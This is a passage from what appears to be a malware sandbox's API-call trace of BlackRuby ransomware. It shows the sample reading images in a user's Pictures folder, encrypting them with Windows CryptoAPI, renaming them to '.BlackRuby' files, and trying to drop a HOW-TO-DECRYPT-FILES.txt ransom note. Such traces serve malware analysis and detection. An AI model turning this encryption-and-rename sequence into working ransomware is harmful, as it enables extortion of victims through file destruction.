(lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\AT3mccJcN3_tS5r5Xh.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\at3mccjcn3_ts5r5xh.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_MQ98CdTGkq0VN5YNVeCnVOfwBPuhHJANAdMRf3p.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\encrypted_mq98cdtgkq0vn5ynvecnvofwbpuhhjanadmrf3p.blackruby")) returned 1 [0061.177] GetLastError () returned 0xb7 [0061.177] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x43 [0061.177] GetLastError () returned 0xb7 [0061.177] SetErrorMode (uMode=0x1) returned 0x0 [0061.178] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.178] GetLastError () returned 0x5 [0061.178] SetErrorMode (uMode=0x0) returned 0x1 [0061.178] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg", lpFilePart=0x0) returned 0x37 [0061.178] GetLastError () returned 0x5 [0061.179] SetErrorMode (uMode=0x1) returned 0x0 [0061.179] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\bh9pfw z.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1c189d8 | out: lpFileInformation=0x1c189d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee77a9e0, ftCreationTime.dwHighDateTime=0x1d35003, ftLastAccessTime.dwLowDateTime=0x6f8ee990, ftLastAccessTime.dwHighDateTime=0x1d3549a, ftLastWriteTime.dwLowDateTime=0x6f8ee990, ftLastWriteTime.dwHighDateTime=0x1d3549a, nFileSizeHigh=0x0, nFileSizeLow=0x111e6)) returned 1 [0061.179] GetLastError () returned 0x5 [0061.179] SetErrorMode (uMode=0x0) returned 0x1 [0061.179] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg", lpFilePart=0x0) returned 0x37 [0061.179] GetLastError () returned 0x5 [0061.179] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg", lpFilePart=0x0) returned 0x37 [0061.179] GetLastError () returned 0x5 [0061.179] SetErrorMode (uMode=0x1) returned 0x0 [0061.179] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\bh9pfw z.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.179] GetLastError () returned 0x0 [0061.179] GetFileType (hFile=0x258) returned 0x1 [0061.179] SetErrorMode (uMode=0x0) returned 0x1 [0061.179] GetFileType (hFile=0x258) returned 0x1 [0061.179] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x111e6 [0061.179] GetLastError () returned 0x0 [0061.179] ReadFile (in: hFile=0x258, lpBuffer=0x1c1aa8c, nNumberOfBytesToRead=0x111e6, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c1aa8c*, lpNumberOfBytesRead=0x18ed18*=0x111e6, lpOverlapped=0x0) returned 1 [0061.180] GetLastError () returned 0x0 [0061.180] CloseHandle (hObject=0x258) returned 1 [0061.180] GetLastError () returned 0x0 [0061.180] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg", lpFilePart=0x0) returned 0x37 [0061.180] GetLastError () returned 0x0 [0061.180] SetErrorMode (uMode=0x1) returned 0x0 [0061.180] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\bh9pfw z.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee77a9e0, ftCreationTime.dwHighDateTime=0x1d35003, ftLastAccessTime.dwLowDateTime=0x6f8ee990, ftLastAccessTime.dwHighDateTime=0x1d3549a, ftLastWriteTime.dwLowDateTime=0x6f8ee990, ftLastWriteTime.dwHighDateTime=0x1d3549a, nFileSizeHigh=0x0, nFileSizeLow=0x111e6)) returned 1 [0061.180] GetLastError () returned 0x0 [0061.180] SetErrorMode (uMode=0x0) returned 0x1 [0061.191] CryptImportKey (in: hProv=0x37c790, pbData=0x1c97214, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x3609e0) returned 1 [0061.191] GetLastError () returned 0x0 [0061.191] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.191] GetLastError () returned 0x0 [0061.196] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.196] GetLastError () returned 0x0 [0061.196] CryptDuplicateKey (in: hKey=0x3609e0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360fa0) returned 1 [0061.196] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.196] GetLastError () returned 0x0 [0061.196] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1cc4260*=0x1, dwFlags=0x0) returned 1 [0061.196] GetLastError () returned 0x0 [0061.196] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1cc422c, dwFlags=0x0) returned 1 [0061.196] GetLastError () returned 0x0 [0061.196] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc42a8*, pdwDataLen=0x18ed08*=0x112e0, dwBufLen=0x112e0 | out: pbData=0x1cc42a8*, pdwDataLen=0x18ed08*=0x112e0) returned 1 [0061.196] GetLastError () returned 0x0 [0061.197] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ce6894*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1ce6894*, pdwDataLen=0x18ed20*=0x10) returned 1 [0061.197] GetLastError () returned 0x0 [0061.197] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ce68c4*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1ce68c4*, pdwDataLen=0x18ed28*=0x10) returned 1 [0061.197] GetLastError () returned 0x0 [0061.197] CryptDestroyKey (hKey=0x3609e0) returned 1 [0061.197] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.197] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0061.197] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg", lpFilePart=0x0) returned 0x37 [0061.197] GetLastError () returned 0x0 [0061.197] SetErrorMode (uMode=0x1) returned 0x0 [0061.198] GetFileType (hFile=0x258) returned 0x1 [0061.198] GetFileType (hFile=0x258) returned 0x1 [0061.200] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\bh9pFW z.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\bh9pfw z.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_0HALGh455Sqopyu9evP33L6YPo2g9fYHL3OMh6WdjwY6s.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\encrypted_0halgh455sqopyu9evp33l6ypo2g9fyhl3omh6wdjwy6s.blackruby")) returned 1 [0061.201] GetLastError () returned 0xb7 [0061.202] SetErrorMode (uMode=0x0) returned 0x1 [0061.202] GetFileType (hFile=0x258) returned 0x1 [0061.202] GetFileType (hFile=0x258) returned 0x1 [0061.202] ReadFile (in: hFile=0x258, lpBuffer=0x2ba25a0, nNumberOfBytesToRead=0x17cdf, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2ba25a0*, lpNumberOfBytesRead=0x18ed18*=0x17cdf, lpOverlapped=0x0) returned 1 [0061.203] GetLastError () returned 0x0 [0061.240] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b71564, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360a20) returned 1 [0061.240] GetLastError () returned 0x0 [0061.240] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.240] GetLastError () returned 0x0 [0061.245] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.245] GetLastError () returned 0x0 [0061.245] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360aa0) returned 1 [0061.245] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.245] GetLastError () returned 0x0 [0061.245] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1b9e5b0*=0x1, dwFlags=0x0) returned 1 [0061.245] GetLastError () returned 0x0 [0061.246] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1b9e57c, dwFlags=0x0) returned 1 [0061.246] GetLastError () returned 0x0 [0061.246] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2bd20a0*, pdwDataLen=0x18ed08*=0x17dd0, dwBufLen=0x17dd0 | out: pbData=0x2bd20a0*, pdwDataLen=0x18ed08*=0x17dd0) returned 1 [0061.247] GetLastError () returned 0x0 [0061.247] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b9e60c*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b9e60c*, pdwDataLen=0x18ed20*=0x10) returned 1 [0061.247] GetLastError () returned 0x0 [0061.247] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b9e63c*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b9e63c*, pdwDataLen=0x18ed28*=0x10) returned 1 [0061.247] GetLastError () returned 0x0 [0061.248] CryptDestroyKey (hKey=0x360a20) returned 1 [0061.248] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.248] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0061.248] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\FxZS1ge.bmp", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\FxZS1ge.bmp", lpFilePart=0x0) returned 0x36 [0061.249] GetLastError () returned 0x0 [0061.249] SetErrorMode (uMode=0x1) returned 0x0 [0061.249] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\FxZS1ge.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\fxzs1ge.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.250] GetLastError () returned 0xb7 [0061.250] GetFileType (hFile=0x258) returned 0x1 [0061.250] SetErrorMode (uMode=0x0) returned 0x1 [0061.250] GetFileType (hFile=0x258) returned 0x1 [0061.252] CloseHandle (hObject=0x258) returned 1 [0061.252] GetLastError () returned 0xb7 [0061.252] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\FxZS1ge.bmp", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\FxZS1ge.bmp", lpFilePart=0x0) returned 0x36 [0061.252] GetLastError () returned 0xb7 [0061.252] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_FxmLMabuVI48xfHAslP0dauaMTEF77ik8sj3.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_FxmLMabuVI48xfHAslP0dauaMTEF77ik8sj3.BlackRuby", lpFilePart=0x0) returned 0x63 [0061.252] GetLastError () returned 0xb7 [0061.252] SetErrorMode (uMode=0x1) returned 0x0 [0061.252] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\FxZS1ge.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\fxzs1ge.bmp"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa99c94b0, ftCreationTime.dwHighDateTime=0x1d3562b, ftLastAccessTime.dwLowDateTime=0x4826d490, ftLastAccessTime.dwHighDateTime=0x1d35444, ftLastWriteTime.dwLowDateTime=0x2cb487a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x17de0)) returned 1 [0061.252] GetLastError () returned 0xb7 [0061.252] SetErrorMode (uMode=0x0) returned 0x1 [0061.252] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\FxZS1ge.bmp" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\fxzs1ge.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_FxmLMabuVI48xfHAslP0dauaMTEF77ik8sj3.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\encrypted_fxmlmabuvi48xfhaslp0dauamtef77ik8sj3.blackruby")) returned 1 [0061.253] GetLastError () returned 0xb7 [0061.253] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x43 [0061.253] GetLastError () returned 0xb7 [0061.253] SetErrorMode (uMode=0x1) returned 0x0 [0061.253] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.253] GetLastError () returned 0x5 [0061.254] SetErrorMode (uMode=0x0) returned 0x1 [0061.254] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg", lpFilePart=0x0) returned 0x3f [0061.254] GetLastError () returned 0x5 [0061.255] SetErrorMode (uMode=0x1) returned 0x0 [0061.255] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\gy8tf gpdrgowkok.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1bbb97c | out: lpFileInformation=0x1bbb97c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75abf20, ftCreationTime.dwHighDateTime=0x1d357d3, ftLastAccessTime.dwLowDateTime=0xe6d16660, ftLastAccessTime.dwHighDateTime=0x1d34f2a, ftLastWriteTime.dwLowDateTime=0xe6d16660, ftLastWriteTime.dwHighDateTime=0x1d34f2a, nFileSizeHigh=0x0, nFileSizeLow=0x1417)) returned 1 [0061.255] GetLastError () returned 0x5 [0061.255] SetErrorMode (uMode=0x0) returned 0x1 [0061.255] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg", lpFilePart=0x0) returned 0x3f [0061.255] GetLastError () returned 0x5 [0061.255] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg", lpFilePart=0x0) returned 0x3f [0061.255] GetLastError () returned 0x5 [0061.255] SetErrorMode (uMode=0x1) returned 0x0 [0061.255] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\gy8tf gpdrgowkok.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.255] GetLastError () returned 0x0 [0061.255] GetFileType (hFile=0x258) returned 0x1 [0061.255] SetErrorMode (uMode=0x0) returned 0x1 [0061.255] GetFileType (hFile=0x258) returned 0x1 [0061.255] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x1417 [0061.255] GetLastError () returned 0x0 [0061.255] ReadFile (in: hFile=0x258, lpBuffer=0x1bbd920, nNumberOfBytesToRead=0x1417, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1bbd920*, lpNumberOfBytesRead=0x18ed18*=0x1417, lpOverlapped=0x0) returned 1 [0061.256] GetLastError () returned 0x0 [0061.256] CloseHandle (hObject=0x258) returned 1 [0061.256] GetLastError () returned 0x0 [0061.256] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg", lpFilePart=0x0) returned 0x3f [0061.256] GetLastError () returned 0x0 [0061.256] SetErrorMode (uMode=0x1) returned 0x0 [0061.256] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\gy8tf gpdrgowkok.jpg"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75abf20, ftCreationTime.dwHighDateTime=0x1d357d3, ftLastAccessTime.dwLowDateTime=0xe6d16660, ftLastAccessTime.dwHighDateTime=0x1d34f2a, ftLastWriteTime.dwLowDateTime=0xe6d16660, ftLastWriteTime.dwHighDateTime=0x1d34f2a, nFileSizeHigh=0x0, nFileSizeLow=0x1417)) returned 1 [0061.256] GetLastError () returned 0x0 [0061.256] SetErrorMode (uMode=0x0) returned 0x1 [0061.267] CryptImportKey (in: hProv=0x37c818, pbData=0x1c1a530, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360e60) returned 1 [0061.267] GetLastError () returned 0x0 [0061.267] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.267] GetLastError () returned 0x0 [0061.272] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.272] GetLastError () returned 0x0 [0061.272] CryptDuplicateKey (in: hKey=0x360e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360f60) returned 1 [0061.272] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.272] GetLastError () returned 0x0 [0061.272] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1c4757c*=0x1, dwFlags=0x0) returned 1 [0061.272] GetLastError () returned 0x0 [0061.272] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1c47548, dwFlags=0x0) returned 1 [0061.272] GetLastError () returned 0x0 [0061.272] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c475c4*, pdwDataLen=0x18ed08*=0x1510, dwBufLen=0x1510 | out: pbData=0x1c475c4*, pdwDataLen=0x18ed08*=0x1510) returned 1 [0061.272] GetLastError () returned 0x0 [0061.272] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c4a010*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c4a010*, pdwDataLen=0x18ed20*=0x10) returned 1 [0061.272] GetLastError () returned 0x0 [0061.273] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c4a040*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c4a040*, pdwDataLen=0x18ed28*=0x10) returned 1 [0061.273] GetLastError () returned 0x0 [0061.273] CryptDestroyKey (hKey=0x360e60) returned 1 [0061.273] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.273] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.273] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg", lpFilePart=0x0) returned 0x3f [0061.273] GetLastError () returned 0x0 [0061.273] SetErrorMode (uMode=0x1) returned 0x0 [0061.274] GetFileType (hFile=0x258) returned 0x1 [0061.274] SetErrorMode (uMode=0x0) returned 0x1 [0061.274] GetFileType (hFile=0x258) returned 0x1 [0061.274] WriteFile (in: hFile=0x258, lpBuffer=0x1c4ca9c*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x1c4ca9c*, lpNumberOfBytesWritten=0x18ed24*=0x1520, lpOverlapped=0x0) returned 1 [0061.275] GetLastError () returned 0xb7 [0061.275] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\gY8TF GpDrGowkOk.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\gy8tf gpdrgowkok.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\Encrypted_3ooYQeBjqvkQPZdv13bPAWKBasMEwS7eIHlyrRoWOZ.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\encrypted_3ooyqebjqvkqpzdv13bpawkbasmews7eihlyrrowoz.blackruby")) returned 1 [0061.275] GetLastError () returned 0xb7 [0061.276] SetErrorMode (uMode=0x0) returned 0x1 [0061.277] GetFileType (hFile=0x258) returned 0x1 [0061.277] SetErrorMode (uMode=0x0) returned 0x1 [0061.277] GetFileType (hFile=0x258) returned 0x1 [0061.277] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x1207d [0061.277] GetLastError () returned 0x0 [0061.277] ReadFile (in: hFile=0x258, lpBuffer=0x1c6d00c, nNumberOfBytesToRead=0x1207d, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c6d00c*, lpNumberOfBytesRead=0x18ed18*=0x1207d, lpOverlapped=0x0) returned 1 [0061.278] GetLastError () returned 0x0 [0061.288] CryptImportKey (in: hProv=0x37c790, pbData=0x1ceb4b0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360b60) returned 1 [0061.288] GetLastError () returned 0x0 [0061.288] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.288] GetLastError () returned 0x0 [0061.293] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.293] GetLastError () returned 0x0 [0061.294] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360ae0) returned 1 [0061.294] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.294] GetLastError () returned 0x0 [0061.294] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1d184fc*=0x1, dwFlags=0x0) returned 1 [0061.294] GetLastError () returned 0x0 [0061.294] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1d184c8, dwFlags=0x0) returned 1 [0061.294] GetLastError () returned 0x0 [0061.294] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d18544*, pdwDataLen=0x18ed08*=0x12170, dwBufLen=0x12170 | out: pbData=0x1d18544*, pdwDataLen=0x18ed08*=0x12170) returned 1 [0061.294] GetLastError () returned 0x0 [0061.294] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d3c850*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1d3c850*, pdwDataLen=0x18ed20*=0x10) returned 1 [0061.294] GetLastError () returned 0x0 [0061.295] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d3c880*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1d3c880*, pdwDataLen=0x18ed28*=0x10) returned 1 [0061.295] GetLastError () returned 0x0 [0061.299] CryptDestroyKey (hKey=0x360b60) 